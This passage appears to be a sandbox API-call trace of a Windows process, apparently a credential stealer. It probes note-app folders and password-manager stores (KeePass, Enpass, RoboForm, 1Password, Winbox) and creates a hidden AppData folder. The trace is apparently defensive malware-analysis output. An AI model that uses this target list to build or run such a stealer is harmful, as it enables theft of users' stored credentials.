returned 0x5b0000 [0116.639] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.639] GetProcessHeap () returned 0x5b0000 [0116.639] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c94c8 | out: hHeap=0x5b0000) returned 1 [0116.639] GetProcessHeap () returned 0x5b0000 [0116.639] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.640] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.643] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0116.643] GetProcessHeap () returned 0x5b0000 [0116.643] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5ccd70 [0116.644] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.645] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\stickies\\rtf", arglist=0xdfb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0116.645] GetProcessHeap () returned 0x5b0000 [0116.645] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5c94c8 [0116.645] GetProcessHeap () returned 0x5b0000 [0116.645] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.647] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0116.647] GetProcessHeap () returned 0x5b0000 [0116.648] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.648] GetProcessHeap () returned 0x5b0000 [0116.648] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c94c8 | out: hHeap=0x5b0000) returned 1 [0116.648] GetProcessHeap () returned 0x5b0000 [0116.648] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.648] GetProcessHeap () returned 0x5b0000 [0116.649] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0116.649] GetProcessHeap () returned 0x5b0000 [0116.649] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x12c) returned 0x5c9390 [0116.649] GetProcessHeap () returned 0x5b0000 [0116.649] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc1b8 [0116.649] GetProcessHeap () returned 0x5b0000 [0116.649] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.650] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.650] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0116.651] GetProcessHeap () returned 0x5b0000 [0116.651] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f60) returned 0x5ccd70 [0116.652] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.652] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\NoteFly\\notes", arglist=0xdfb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0116.653] GetProcessHeap () returned 0x5b0000 [0116.653] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5c94c8 [0116.653] GetProcessHeap () returned 0x5b0000 [0116.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.654] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0116.655] GetProcessHeap () returned 0x5b0000 [0116.655] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.655] GetProcessHeap () returned 0x5b0000 [0116.655] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c94c8 | out: hHeap=0x5b0000) returned 1 [0116.655] GetProcessHeap () returned 0x5b0000 [0116.656] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.656] GetProcessHeap () returned 0x5b0000 [0116.656] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc1b8 | out: hHeap=0x5b0000) returned 1 [0116.656] GetProcessHeap () returned 0x5b0000 [0116.656] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f86) returned 0x5ccd70 [0116.657] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.659] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0xdfb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0116.659] GetProcessHeap () returned 0x5b0000 [0116.659] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5c9390 [0116.659] GetProcessHeap () returned 0x5b0000 [0116.660] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.661] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0116.661] GetProcessHeap () returned 0x5b0000 [0116.661] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.661] GetProcessHeap () returned 0x5b0000 [0116.661] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f92) returned 0x5ccd70 [0116.662] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.663] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0xdfb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0116.663] GetProcessHeap () returned 0x5b0000 [0116.663] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bae18 [0116.663] GetProcessHeap () returned 0x5b0000 [0116.663] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.664] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0116.664] GetProcessHeap () returned 0x5b0000 [0116.664] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bae18 | out: hHeap=0x5b0000) returned 1 [0116.664] GetProcessHeap () returned 0x5b0000 [0116.664] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.665] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.665] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.665] GetProcessHeap () returned 0x5b0000 [0116.665] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5ccd70 [0116.666] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.667] wvsprintfW (in: param_1=0x5ccd70, param_2="%s", arglist=0xdfb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0116.667] GetProcessHeap () returned 0x5b0000 [0116.667] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x42) returned 0x5c8de0 [0116.667] GetProcessHeap () returned 0x5b0000 [0116.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.668] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0116.668] GetProcessHeap () returned 0x5b0000 [0116.669] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.670] Sleep (dwMilliseconds=0xa) [0116.723] GetProcessHeap () returned 0x5b0000 [0116.723] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.723] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.724] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0116.724] GetProcessHeap () returned 0x5b0000 [0116.724] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x50) returned 0x5c9390 [0116.724] GetProcessHeap () returned 0x5b0000 [0116.725] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.725] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdbx"), lpFindFileData=0xdf8f4 | out: lpFindFileData=0xdf8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="跠\\鎐\\")) returned 0xffffffff [0116.726] GetProcessHeap () returned 0x5b0000 [0116.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.726] GetProcessHeap () returned 0x5b0000 [0116.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8de0 | out: hHeap=0x5b0000) returned 1 [0116.726] GetProcessHeap () returned 0x5b0000 [0116.726] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.727] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.728] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0116.728] GetProcessHeap () returned 0x5b0000 [0116.728] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5ccd70 [0116.728] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.729] wvsprintfW (in: param_1=0x5ccd70, param_2="%s", arglist=0xdfb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0116.729] GetProcessHeap () returned 0x5b0000 [0116.729] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5bbc18 [0116.729] GetProcessHeap () returned 0x5b0000 [0116.730] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.731] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0116.731] GetProcessHeap () returned 0x5b0000 [0116.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.732] Sleep (dwMilliseconds=0xa) [0116.756] GetProcessHeap () returned 0x5b0000 [0116.756] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.757] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.757] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0116.757] GetProcessHeap () returned 0x5b0000 [0116.757] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4c) returned 0x5c9390 [0116.758] GetProcessHeap () returned 0x5b0000 [0116.758] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.758] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdbx"), lpFindFileData=0xdf8dc | out: lpFindFileData=0xdf8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="반[鎐\\")) returned 0xffffffff [0116.759] GetProcessHeap () returned 0x5b0000 [0116.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.759] GetProcessHeap () returned 0x5b0000 [0116.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bbc18 | out: hHeap=0x5b0000) returned 1 [0116.759] GetProcessHeap () returned 0x5b0000 [0116.759] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.760] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.761] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.761] GetProcessHeap () returned 0x5b0000 [0116.761] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5ccd70 [0116.761] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.762] wvsprintfW (in: param_1=0x5ccd70, param_2="%s", arglist=0xdfb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0116.762] GetProcessHeap () returned 0x5b0000 [0116.762] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x42) returned 0x5c8e80 [0116.762] GetProcessHeap () returned 0x5b0000 [0116.763] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.763] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0116.764] GetProcessHeap () returned 0x5b0000 [0116.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.769] Sleep (dwMilliseconds=0xa) [0116.845] GetProcessHeap () returned 0x5b0000 [0116.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.845] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.846] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0116.846] GetProcessHeap () returned 0x5b0000 [0116.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4e) returned 0x5c9390 [0116.846] GetProcessHeap () returned 0x5b0000 [0116.847] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.847] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.kdb"), lpFindFileData=0xdf8c4 | out: lpFindFileData=0xdf8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="躀\\鎐\\")) returned 0xffffffff [0116.847] GetProcessHeap () returned 0x5b0000 [0116.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.848] GetProcessHeap () returned 0x5b0000 [0116.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8e80 | out: hHeap=0x5b0000) returned 1 [0116.848] GetProcessHeap () returned 0x5b0000 [0116.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.848] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.849] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0116.849] GetProcessHeap () returned 0x5b0000 [0116.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f44) returned 0x5ccd70 [0116.850] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.850] wvsprintfW (in: param_1=0x5ccd70, param_2="%s", arglist=0xdfb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0116.850] GetProcessHeap () returned 0x5b0000 [0116.850] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5bbfc0 [0116.850] GetProcessHeap () returned 0x5b0000 [0116.851] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.851] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0116.852] GetProcessHeap () returned 0x5b0000 [0116.852] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.853] Sleep (dwMilliseconds=0xa) [0116.878] GetProcessHeap () returned 0x5b0000 [0116.878] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.879] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.880] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0116.880] GetProcessHeap () returned 0x5b0000 [0116.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5c9390 [0116.880] GetProcessHeap () returned 0x5b0000 [0116.880] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.881] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.kdb"), lpFindFileData=0xdf8f4 | out: lpFindFileData=0xdf8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="뿀[鎐\\")) returned 0xffffffff [0116.881] GetProcessHeap () returned 0x5b0000 [0116.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.881] GetProcessHeap () returned 0x5b0000 [0116.882] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bbfc0 | out: hHeap=0x5b0000) returned 1 [0116.882] GetProcessHeap () returned 0x5b0000 [0116.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0116.882] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.883] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.883] GetProcessHeap () returned 0x5b0000 [0116.883] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f52) returned 0x5ccd70 [0116.884] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.884] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\Enpass", arglist=0xdfb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0116.884] GetProcessHeap () returned 0x5b0000 [0116.884] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x50) returned 0x5cc9f0 [0116.884] GetProcessHeap () returned 0x5b0000 [0116.885] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.886] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0116.886] GetProcessHeap () returned 0x5b0000 [0116.886] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.886] GetProcessHeap () returned 0x5b0000 [0116.887] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.887] GetProcessHeap () returned 0x5b0000 [0116.887] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.887] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.888] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.888] GetProcessHeap () returned 0x5b0000 [0116.888] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f66) returned 0x5ccd70 [0116.889] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.890] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\My RoboForm Data", arglist=0xdfb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0116.890] GetProcessHeap () returned 0x5b0000 [0116.890] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x64) returned 0x5c9390 [0116.890] GetProcessHeap () returned 0x5b0000 [0116.890] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.894] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0116.894] GetProcessHeap () returned 0x5b0000 [0116.894] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.895] GetProcessHeap () returned 0x5b0000 [0116.895] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.895] GetProcessHeap () returned 0x5b0000 [0116.895] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.896] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.896] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0116.896] GetProcessHeap () returned 0x5b0000 [0116.896] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f58) returned 0x5ccd70 [0116.897] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.898] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\1Password", arglist=0xdfb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0116.898] GetProcessHeap () returned 0x5b0000 [0116.898] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x56) returned 0x5c9390 [0116.898] GetProcessHeap () returned 0x5b0000 [0116.898] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.899] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0116.899] GetProcessHeap () returned 0x5b0000 [0116.900] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.900] GetProcessHeap () returned 0x5b0000 [0116.900] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.900] GetProcessHeap () returned 0x5b0000 [0116.900] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.901] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0116.901] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0116.901] GetProcessHeap () returned 0x5b0000 [0116.901] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5ccd70 [0116.902] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.903] wvsprintfW (in: param_1=0x5ccd70, param_2="Mikrotik\\Winbox", arglist=0xdfb5c | out: param_1="Mikrotik\\Winbox") returned 15 [0116.903] GetProcessHeap () returned 0x5b0000 [0116.903] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x22) returned 0x5c87d0 [0116.903] GetProcessHeap () returned 0x5b0000 [0116.903] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.904] PathFileExistsW (pszPath="Mikrotik\\Winbox") returned 0 [0116.904] GetProcessHeap () returned 0x5b0000 [0116.904] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.904] GetProcessHeap () returned 0x5b0000 [0116.905] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c87d0 | out: hHeap=0x5b0000) returned 1 [0117.066] GetProcessHeap () returned 0x5b0000 [0117.067] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0117.067] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0117.068] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5cc9f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0117.068] GetProcessHeap () returned 0x5b0000 [0117.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0117.069] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0117.069] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdf994 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0117.069] GetProcessHeap () 